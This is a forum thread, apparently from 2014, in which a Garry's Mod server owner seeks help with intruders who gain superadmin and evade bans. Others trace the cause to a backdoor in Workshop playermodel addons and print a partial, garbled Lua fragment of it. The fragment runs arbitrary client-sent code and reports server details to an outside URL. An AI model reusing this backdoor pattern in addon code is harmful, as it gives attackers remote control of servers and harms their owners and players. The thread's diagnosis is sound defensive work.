So over the past few days things have got pretty bad on my deathrun server. Someone with playermodels on the workshop joined (they were added on my server) and was able to give himself superadmin and then give people points in the pointshop. I banned him thinking well must have been an exploit.
Since then, a lot of others have joined doing the same thing except they would ban users to. When staff banned them it would just ban someone else in the server. The hackers were able to rejoin like they weren’t banned at all. And some of the people who were banned because staff was banning the hackers. So basically at this point, they bypass bans, can give themselves ranks, can ban people, and access pointshop.
I thought maybe it was an RCON exploit or whatever, so I disabled it and added something that bans you if you get the password wrong. I set sv_allowcslua to 0 and sv_allowupload/download to 0. I got all the IPs I could find but and banned them but for some reason the same one has joined back more than 3 times. Guess whos it is? The guy from steam workshop. He used different names and accounts all under the same IP. There are also a few other IPs involved. Also, a few of them used voice chat and had different voices so its more than one person.
Well after all of my efforts they still were able to come on today and bypass bans.
I really do not know what to do. I have logs and ips and steam ids-- all banned but they can still connect!
Please please help!
[editline]1st August 2014[/editline]
Also, when I banned the guy from the workshop he said to one of my admins “i admin I was trolling, gave myself admin using an exploit then tested to see if it worked by settings points :p”
[editline]1st August 2014[/editline]
Oh and one more thing, I have removed his models from my servers as well.
If you’ve removed his stuff and it’s still happening, there’s probably something else that was added in as an exploit. I’d do a backup, then clear all of your addons out and basically reinstall the server and re-add them, minus that guy’s shit.
It looks like this is in most, if not all of his playermodel addon scripts that come packaged with the models. I know nothing about coding so I can’t really translate it. Any chance we can get more info on this so we can at least make sure people don’t continue cramming his addons on their server?
I had nothing to do at the moment so I “decoded” the exploit:
if SERVER and game.IsDedicated() then
local f = (function() end)
local c = CompileString
local r = net.ReadString
net.Receivers.m9k_addons = function()
local s = c(r() or "--", "[C]", false)
if type(s) ~= "string" then
hn = GetConVarString("hostname"),
ip = GetConVarString("ip"),
np = #player.GetAll()
}, f, f)
It basically allows to run arbitrary Lua code on dedicated servers and sends shitty statistics (server name/IP and number of players) to some URL.
People with addons on the workshop will put backdoors in their lua files and basically what they are doing is if a players steam ID == the creator of the addon then set their usergroup to superadmin. They then have access to everything.
I’m guessing those statistics are actually there so he knows what servers have the addon installed so he can go have his fun.
Unfortunately it’s a little more than that. Your average player (or server host) isn’t going to check every single addon for exploits, and this code isn’t just “hey, give me admin” but rather it’s been obfuscated and even hidden in a spot that’s obvious yet easy for some people to miss. In other words, he’s not setting himself as an admin for shits and giggles but rather he’s creating a backdoor that allows him to hop in, do whatever he wants, and freak the shit out of people who most likely have no idea what’s going on.
In any case, thanks for the help, mijyuoon. I’m not quite sure where to go from here yet, but I’ll figure it out.